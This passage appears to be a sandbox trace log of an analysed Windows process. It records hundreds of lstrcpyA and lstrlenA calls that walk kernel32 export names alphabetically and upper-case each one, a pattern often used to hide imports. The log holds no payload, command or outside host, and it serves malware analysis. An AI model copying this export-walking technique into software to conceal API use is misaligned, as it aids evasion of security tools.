(lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.345] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.345] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.345] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.345] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.345] lstrlenA (lpString="COPYFILEA") returned 9 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.345] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.346] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.346] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.346] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.346] lstrlenA (lpString="COPYFILEW") returned 9 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.346] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.346] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.346] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.346] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.346] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.346] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.346] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.346] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.346] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.346] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.346] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.346] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.346] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.346] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.346] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.346] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.347] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.347] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.347] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.347] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.347] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.347] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.347] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.347] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.347] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.347] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.347] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.347] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.347] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.347] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.347] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.347] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.347] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.347] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.347] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.347] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.348] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.348] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.348] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.348] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.348] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.348] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.348] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.348] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.348] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.348] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.348] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.348] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.348] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.348] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.348] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.348] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.348] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.348] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.348] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.348] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.349] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.349] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.349] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.349] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.349] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.349] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.349] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.349] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.349] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.349] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.349] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.349] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.349] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.349] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.349] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.349] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.349] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.349] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.349] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.350] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.350] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.350] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.350] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.350] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.350] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.350] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.350] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.350] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.350] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.350] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.350] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.350] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.350] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.350] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.350] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.350] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.350] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.350] lstrlenA (lpString="DELETEATOM") returned 10 [0077.350] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.351] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.351] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.351] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.351] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.351] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.351] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.351] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.351] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.351] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.351] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.351] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.351] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.351] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.351] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.351] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.351] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.351] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.351] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.351] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.351] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.352] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.352] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.352] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.352] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.352] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.352] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.352] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.352] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.352] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.352] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.352] 